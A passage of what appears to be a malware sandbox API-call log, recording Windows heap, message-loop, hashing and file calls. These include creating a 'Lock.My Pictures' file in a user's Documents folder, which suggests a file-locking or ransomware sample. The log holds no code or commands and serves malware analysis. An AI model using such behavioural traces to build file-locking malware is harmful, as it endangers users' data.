[0218.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.498] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.498] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0218.498] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.498] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0218.498] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0218.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0218.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0218.498] CryptDestroyHash (hHash=0x9e1cb8) returned 1 [0218.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0218.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0218.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb00 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0218.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0218.499] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0218.499] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.499] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.499] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/My Pictures" (normalized: "c:\\users\\fd1hvy\\documents\\my pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0218.500] GetLastError () returned 0x5 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3855010 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0218.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0218.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0218.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0218.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0218.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854128 [0218.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0218.502] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0218.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854128 | out: hHeap=0x2af0000) returned 1 [0218.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0218.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0218.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0218.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0218.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.My Pictures" (normalized: "c:\\users\\fd1hvy\\documents\\lock.my pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0218.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0218.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0218.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0218.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0218.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0218.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0218.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.506] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0218.506] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0218.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0218.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0218.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0218.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0218.507] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0218.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0218.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0218.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0218.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0218.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0218.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab338 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0218.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0218.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0218.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0218.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0218.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 